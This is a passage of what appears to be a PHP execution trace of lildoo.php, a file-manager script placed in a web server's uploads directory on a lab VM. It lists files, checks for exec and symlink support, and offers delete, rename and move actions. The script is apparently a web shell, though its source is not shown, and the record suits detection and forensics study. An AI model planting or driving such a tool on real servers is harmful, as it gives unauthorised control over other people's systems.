'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 5 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
3	206	0	0.013550	800040	listing	1		/var/www/html/uploads/lildoo.php	1214	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 5 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
4	207	0	0.013621	800040	column_title	1		/var/www/html/uploads/lildoo.php	1236	3	'filename'	'filename'	FALSE
5	208	0	0.013637	800040	urlencode	0		/var/www/html/uploads/lildoo.php	1416	1	'/var/www/html/uploads/'
5	208	1	0.013651	800136
5	208	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/lildoo.php	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/lildoo.php	1418	$arr = ''
4		A						/var/www/html/uploads/lildoo.php	1421	$r = '&amp;reverse=true'
4		A						/var/www/html/uploads/lildoo.php	1422	$arr = ' &and;'
5	209	0	0.013712	800280	word	1		/var/www/html/uploads/lildoo.php	1429	1	'filename'
6	210	0	0.013726	800280	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'Filename'	2	'UTF-8'
6	210	1	0.013742	800552
6	210	R			'Filename'
5	209	1	0.013757	800440
5	209	R			'Filename'
4	207	1	0.013772	800040
4	211	0	0.013779	800040	column_title	1		/var/www/html/uploads/lildoo.php	1237	3	'size'	'filename'	FALSE
5	212	0	0.013794	800040	urlencode	0		/var/www/html/uploads/lildoo.php	1416	1	'/var/www/html/uploads/'
5	212	1	0.013807	800136
5	212	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/lildoo.php	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/lildoo.php	1418	$arr = ''
4		A						/var/www/html/uploads/lildoo.php	1427	$r = ''
5	213	0	0.013855	800248	word	1		/var/www/html/uploads/lildoo.php	1429	1	'size'
6	214	0	0.013867	800248	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'Size'	2	'UTF-8'
6	214	1	0.013882	800520
6	214	R			'Size'
5	213	1	0.013896	800408
5	213	R			'Size'
4	211	1	0.013909	800040
4	215	0	0.013917	800040	column_title	1		/var/www/html/uploads/lildoo.php	1240	3	'permission'	'filename'	FALSE
5	216	0	0.013937	800040	urlencode	0		/var/www/html/uploads/lildoo.php	1416	1	'/var/www/html/uploads/'
5	216	1	0.013950	800136
5	216	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/lildoo.php	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/lildoo.php	1418	$arr = ''
4		A						/var/www/html/uploads/lildoo.php	1427	$r = ''
5	217	0	0.014072	800248	word	1		/var/www/html/uploads/lildoo.php	1429	1	'permission'
6	218	0	0.014086	800248	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'Permission'	2	'UTF-8'
6	218	1	0.014101	800520
6	218	R			'Permission'
5	217	1	0.014115	800408
5	217	R			'Permission'
4	215	1	0.014139	800152
4	219	0	0.014147	800152	column_title	1		/var/www/html/uploads/lildoo.php	1241	3	'owner'	'filename'	FALSE
5	220	0	0.014162	800152	urlencode	0		/var/www/html/uploads/lildoo.php	1416	1	'/var/www/html/uploads/'
5	220	1	0.014175	800248
5	220	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/lildoo.php	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/lildoo.php	1418	$arr = ''
4		A						/var/www/html/uploads/lildoo.php	1427	$r = ''
5	221	0	0.014221	800360	word	1		/var/www/html/uploads/lildoo.php	1429	1	'owner'
6	222	0	0.014233	800360	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'Owner'	2	'UTF-8'
6	222	1	0.014247	800632
6	222	R			'Owner'
5	221	1	0.014261	800520
5	221	R			'Owner'
4	219	1	0.014275	800152
4	223	0	0.014281	800152	column_title	1		/var/www/html/uploads/lildoo.php	1242	3	'group'	'filename'	FALSE
5	224	0	0.014296	800152	urlencode	0		/var/www/html/uploads/lildoo.php	1416	1	'/var/www/html/uploads/'
5	224	1	0.014308	800248
5	224	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/lildoo.php	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/lildoo.php	1418	$arr = ''
4		A						/var/www/html/uploads/lildoo.php	1427	$r = ''
5	225	0	0.014353	800360	word	1		/var/www/html/uploads/lildoo.php	1429	1	'group'
6	226	0	0.014365	800360	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'Group'	2	'UTF-8'
6	226	1	0.014380	800632
6	226	R			'Group'
5	225	1	0.014401	800520
5	225	R			'Group'
4	223	1	0.014415	800152
4	227	0	0.014422	800152	word	1		/var/www/html/uploads/lildoo.php	1245	1	'functions'
5	228	0	0.014435	800152	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'Functions'	2	'UTF-8'
5	228	1	0.014449	800424
5	228	R			'Functions'
4	227	1	0.014463	800312
4	227	R			'Functions'
3		A						/var/www/html/uploads/lildoo.php	1249	$i = 0
4	229	0	0.014486	800152	sizeof	0		/var/www/html/uploads/lildoo.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 5 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
4	229	1	0.014558	800184
4	229	R			6
3		A						/var/www/html/uploads/lildoo.php	1250	$file = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	230	0	0.014599	800152	date	0		/var/www/html/uploads/lildoo.php	1252	2	'n/j/y H:i:s'	1676257694
4	230	1	0.014674	802544
4	230	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1252	$timestamps = 'mtime: 2/12/23 22:08:14, '
4	231	0	0.014705	802272	date	0		/var/www/html/uploads/lildoo.php	1253	2	'n/j/y H:i:s'	1676257694
4	231	1	0.014736	802600
4	231	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1253	$timestamps .= 'atime: 2/12/23 22:08:14, '
4	232	0	0.014763	802296	date	0		/var/www/html/uploads/lildoo.php	1254	2	'n/j/y H:i:s'	1676257694
4	232	1	0.014793	802624
4	232	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1254	$timestamps .= 'ctime: 2/12/23 22:08:14'
4	233	0	0.014819	802520	html	1		/var/www/html/uploads/lildoo.php	1258	1	'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
5	234	0	0.014834	802520	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'	2	NULL
5	234	1	0.014851	802824
5	234	R			'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
4	233	1	0.014867	802712
4	233	R			'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
4	235	0	0.014883	802384	urlencode	0		/var/www/html/uploads/lildoo.php	1281	1	'/var/www/html/uploads/.'
4	235	1	0.014896	802480
4	235	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.'
4	236	0	0.014913	802424	html	1		/var/www/html/uploads/lildoo.php	1281	1	'.'
5	237	0	0.014925	802424	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'.'	2	NULL
5	237	1	0.014947	802696
5	237	R			'.'
4	236	1	0.014961	802584
4	236	R			'.'
4	238	0	0.014975	802328	human_filesize	1		/var/www/html/uploads/lildoo.php	1304	1	4096
4		A						/var/www/html/uploads/lildoo.php	1153	$suffices = 'kMGTPE'
4		A						/var/www/html/uploads/lildoo.php	1155	$n = 0
4		A						/var/www/html/uploads/lildoo.php	1157	$filesize /= 1024
4		A						/var/www/html/uploads/lildoo.php	1158	$n++
5	239	0	0.015029	802328	strpos	0		/var/www/html/uploads/lildoo.php	1161	2	4	'.'
5	239	1	0.015043	802400
5	239	R			FALSE
5	240	0	0.015056	802328	round	0		/var/www/html/uploads/lildoo.php	1161	2	4	3
5	240	1	0.015069	802400
5	240	R			4
4		A						/var/www/html/uploads/lildoo.php	1161	$filesize = 4
5	241	0	0.015093	802328	strpos	0		/var/www/html/uploads/lildoo.php	1163	2	4	'.'
5	241	1	0.015106	802656
5	241	R			FALSE
5	242	0	0.015120	802328	substr	0		/var/www/html/uploads/lildoo.php	1169	3	'kMGTPE'	0	1
5	242	1	0.015134	802424
5	242	R			'k'
4		A						/var/www/html/uploads/lildoo.php	1169	$suffix = 'k'
4	238	1	0.015159	802360
4	238	R			'4 kB'
3		A						/var/www/html/uploads/lildoo.php	1304	$human = ' title="4 kB"'
4	243	0	0.015185	802368	decoct	0		/var/www/html/uploads/lildoo.php	1315	1	16895
4	243	1	0.015197	802440
4	243	R			'40777'
4	244	0	0.015210	802368	function_exists	0		/var/www/html/uploads/lildoo.php	1317	1	'posix_getuid'
4	244	1	0.015225	802408
4	244	R			TRUE
4	245	0	0.015241	802368	posix_getuid	0		/var/www/html/uploads/lildoo.php	1317	0
4	245	1	0.015264	802368
4	245	R			33
3		A						/var/www/html/uploads/lildoo.php	1317	$l = FALSE
4	246	0	0.015294	802368	permission_octal2string	1		/var/www/html/uploads/lildoo.php	1319	1	16895
4		A						/var/www/html/uploads/lildoo.php	970	$type = 'd'
4		A						/var/www/html/uploads/lildoo.php	979	$owner = 'r'
4		A						/var/www/html/uploads/lildoo.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/lildoo.php	984	$owner .= 'x'
4		A						/var/www/html/uploads/lildoo.php	987	$group = 'r'
4		A						/var/www/html/uploads/lildoo.php	988	$group .= 'w'
4		A						/var/www/html/uploads/lildoo.php	992	$group .= 'x'
4		A						/var/www/html/uploads/lildoo.php	995	$other = 'r'
4		A						/var/www/html/uploads/lildoo.php	996	$other .= 'w'
4		A						/var/www/html/uploads/lildoo.php	1000	$other .= 'x'
4	246	1	0.015467	802408
4	246	R			'drwxrwxrwx'
4	247	0	0.015494	802408	html	1		/var/www/html/uploads/lildoo.php	1319	1	'drwxrwxrwx'
5	248	0	0.015516	802408	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'drwxrwxrwx'	2	NULL
5	248	1	0.015540	802680
5	248	R			'drwxrwxrwx'
4	247	1	0.015564	802568
4	247	R			'drwxrwxrwx'
4	249	0	0.015591	802368	array_key_exists	0		/var/www/html/uploads/lildoo.php	1324	2	'owner_name'	['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	249	1	0.015633	802432
4	249	R			TRUE
4	250	0	0.015657	802368	array_key_exists	0		/var/www/html/uploads/lildoo.php	1330	2	'group_name'	['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	250	1	0.015698	802432
4	250	R			TRUE
4	251	0	0.015725	802464	html	1		/var/www/html/uploads/lildoo.php	1339	1	'/var/www/html/uploads/.'
5	252	0	0.015747	802464	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'/var/www/html/uploads/.'	2	NULL
5	252	1	0.015772	802736
5	252	R			'/var/www/html/uploads/.'
4	251	1	0.015798	802624
4	251	R			'/var/www/html/uploads/.'
3		A						/var/www/html/uploads/lildoo.php	1342	$actions = []
4	253	0	0.015842	802368	function_exists	0		/var/www/html/uploads/lildoo.php	1343	1	'symlink'
4	253	1	0.015859	802408
4	253	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	1344	$actions[] = 'create_symlink'
4	254	0	0.015893	802744	dirname	0		/var/www/html/uploads/lildoo.php	1346	1	'/var/www/html/uploads/.'
4	254	1	0.015910	802824
4	254	R			'/var/www/html/uploads'
4	255	0	0.015930	802792	is_writable	0		/var/www/html/uploads/lildoo.php	1346	1	'/var/www/html/uploads'
4	255	1	0.015956	802832
4	255	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/lildoo.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/lildoo.php	1349	$actions[] = 'move'
4	256	0	0.016015	802744	function_exists	0		/var/www/html/uploads/lildoo.php	1356	1	'exec'
4	256	1	0.016032	802784
4	256	R			TRUE
4	257	0	0.016050	802744	sizeof	0		/var/www/html/uploads/lildoo.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move']
4	257	1	0.016071	802776
4	257	R			4
4	258	0	0.016088	802840	str_repeat	0		/var/www/html/uploads/lildoo.php	1363	2	'&nbsp;'	30
4	258	1	0.016106	803128
4	258	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	259	0	0.016128	802808	word	1		/var/www/html/uploads/lildoo.php	1367	1	'create_symlink'
5	260	0	0.016147	802808	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'create symlink'	2	'UTF-8'
5	260	1	0.016168	803080
5	260	R			'create symlink'
4	259	1	0.016188	802968
4	259	R			'create symlink'
4	261	0	0.016208	802800	word	1		/var/www/html/uploads/lildoo.php	1367	1	'delete'
5	262	0	0.016226	802800	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'delete'	2	'UTF-8'
5	262	1	0.016245	803072
5	262	R			'delete'
4	261	1	0.016262	802960
4	261	R			'delete'
4	263	0	0.016280	802800	word	1		/var/www/html/uploads/lildoo.php	1367	1	'rename'
5	264	0	0.016298	802800	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'rename'	2	'UTF-8'
5	264	1	0.016325	803072
5	264	R			'rename'
4	263	1	0.016343	802960
4	263	R			'rename'
4	265	0	0.016363	802792	word	1		/var/www/html/uploads/lildoo.php	1367	1	'move'
5	266	0	0.016382	802792	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'move'	2	'UTF-8'
5	266	1	0.016401	803064
5	266	R			'move'
4	265	1	0.016419	802952
4	265	R			'move'
3		A						/var/www/html/uploads/lildoo.php	1249	$i++
4	267	0	0.016454	802744	sizeof	0		/var/www/html/uploads/lildoo.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 5 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
4	267	1	0.016547	802776
4	267	R			6
3		A						/var/www/html/uploads/lildoo.php	1250	$file = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	268	0	0.016600	802744	date	0		/var/www/html/uploads/lildoo.php	1252	2	'n/j/y H:i:s'	1676257694
4	268	1	0.016641	803072
4	268	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1252	$timestamps = 'mtime: 2/12/23 22:08:14, '
4	269	0	0.016676	802688	date	0		/var/www/html/uploads/lildoo.php	1253	2	'n/j/y H:i:s'	1676257694
4	269	1	0.016715	803016
4	269	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1253	$timestamps .= 'atime: 2/12/23 22:08:14, '
4	270	0	0.016751	802712	date	0		/var/www/html/uploads/lildoo.php	1254	2	'n/j/y H:i:s'	1676257694
4	270	1	0.016789	803040
4	270	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1254	$timestamps .= 'ctime: 2/12/23 22:08:14'
4	271	0	0.016824	802936	html	1		/var/www/html/uploads/lildoo.php	1258	1	'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
5	272	0	0.016843	802936	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'	2	NULL
5	272	1	0.016866	803240
5	272	R			'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
4	271	1	0.016887	803128
4	271	R			'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
4	273	0	0.016909	802800	urlencode	0		/var/www/html/uploads/lildoo.php	1281	1	'/var/www/html/uploads/..'
4	273	1	0.016926	802896
4	273	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F..'
4	274	0	0.016947	802840	html	1		/var/www/html/uploads/lildoo.php	1281	1	'..'
5	275	0	0.016963	802840	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'..'	2	NULL
5	275	1	0.016982	803112
5	275	R			'..'
4	274	1	0.016999	803000
4	274	R			'..'
4	276	0	0.017017	802744	human_filesize	1		/var/www/html/uploads/lildoo.php	1304	1	4096
4		A						/var/www/html/uploads/lildoo.php	1153	$suffices = 'kMGTPE'
4		A						/var/www/html/uploads/lildoo.php	1155	$n = 0
4		A						/var/www/html/uploads/lildoo.php	1157	$filesize /= 1024
4		A						/var/www/html/uploads/lildoo.php	1158	$n++
5	277	0	0.017088	802744	strpos	0		/var/www/html/uploads/lildoo.php	1161	2	4	'.'
5	277	1	0.017105	802816
5	277	R			FALSE
5	278	0	0.017122	802744	round	0		/var/www/html/uploads/lildoo.php	1161	2	4	3
5	278	1	0.017138	802816
5	278	R			4
4		A						/var/www/html/uploads/lildoo.php	1161	$filesize = 4
5	279	0	0.017169	802744	strpos	0		/var/www/html/uploads/lildoo.php	1163	2	4	'.'
5	279	1	0.017186	803072
5	279	R			FALSE
5	280	0	0.017203	802744	substr	0		/var/www/html/uploads/lildoo.php	1169	3	'kMGTPE'	0	1
5	280	1	0.017221	802840
5	280	R			'k'
4		A						/var/www/html/uploads/lildoo.php	1169	$suffix = 'k'
4	276	1	0.017253	802776
4	276	R			'4 kB'
3		A						/var/www/html/uploads/lildoo.php	1304	$human = ' title="4 kB"'
4	281	0	0.017286	802744	decoct	0		/var/www/html/uploads/lildoo.php	1315	1	16895
4	281	1	0.017302	802816
4	281	R			'40777'
4	282	0	0.017320	802744	function_exists	0		/var/www/html/uploads/lildoo.php	1317	1	'posix_getuid'
4	282	1	0.017343	802784
4	282	R			TRUE
4	283	0	0.017360	802744	posix_getuid	0		/var/www/html/uploads/lildoo.php	1317	0
4	283	1	0.017376	802744
4	283	R			33
3		A						/var/www/html/uploads/lildoo.php	1317	$l = FALSE
4	284	0	0.017406	802744	permission_octal2string	1		/var/www/html/uploads/lildoo.php	1319	1	16895
4		A						/var/www/html/uploads/lildoo.php	970	$type = 'd'
4		A						/var/www/html/uploads/lildoo.php	979	$owner = 'r'
4		A						/var/www/html/uploads/lildoo.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/lildoo.php	984	$owner .= 'x'
4		A						/var/www/html/uploads/lildoo.php	987	$group = 'r'
4		A						/var/www/html/uploads/lildoo.php	988	$group .= 'w'
4		A						/var/www/html/uploads/lildoo.php	992	$group .= 'x'
4		A						/var/www/html/uploads/lildoo.php	995	$other = 'r'
4		A						/var/www/html/uploads/lildoo.php	996	$other .= 'w'
4		A						/var/www/html/uploads/lildoo.php	1000	$other .= 'x'
4	284	1	0.017553	802784
4	284	R			'drwxrwxrwx'
4	285	0	0.017571	802784	html	1		/var/www/html/uploads/lildoo.php	1319	1	'drwxrwxrwx'
5	286	0	0.017588	802784	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'drwxrwxrwx'	2	NULL
5	286	1	0.017608	803056
5	286	R			'drwxrwxrwx'
4	285	1	0.017626	802944
4	285	R			'drwxrwxrwx'
4	287	0	0.017644	802744	array_key_exists	0		/var/www/html/uploads/lildoo.php	1324	2	'owner_name'	['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	287	1	0.017683	802808
4	287	R			TRUE
